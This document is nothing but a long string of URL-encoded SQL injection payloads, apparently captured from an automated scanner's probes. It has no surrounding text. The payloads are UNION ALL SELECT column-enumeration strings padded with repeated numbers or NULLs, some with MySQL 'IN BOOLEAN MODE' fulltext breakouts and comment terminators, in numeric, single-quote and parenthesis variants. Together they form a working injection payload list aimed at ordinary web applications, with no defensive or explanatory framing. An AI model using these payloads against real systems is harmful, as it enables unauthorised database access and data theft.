-3741%27%20%2B%20%28SELECT%20%27CjXa%27%20WHERE%202069%3D2069%20UNION%20ALL%20SELECT%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069%2C%202069--%20%20%29%20%2B%20%27 -5785%27%20%2B%20%28SELECT%20%27Yekm%27%20WHERE%209176%3D9176%20UNION%20ALL%20SELECT%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176%2C%209176--%20%20%29%20%2B%20%27 -4511%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147--%20%20%23 -5281%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167%2C%204167--%20%20%23 -2732%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175%2C%206175--%20%20%23 -7269%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620--%20%20%23 -3120%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873%2C%203873--%20%20%23 -8680%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784--%20%20%23 -5230%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573%2C%207573--%20%20%23 -4880%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377%2C%209377--%20%20%23 -8738%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136--%20%20%23 -8581%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018%2C%206018--%20%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 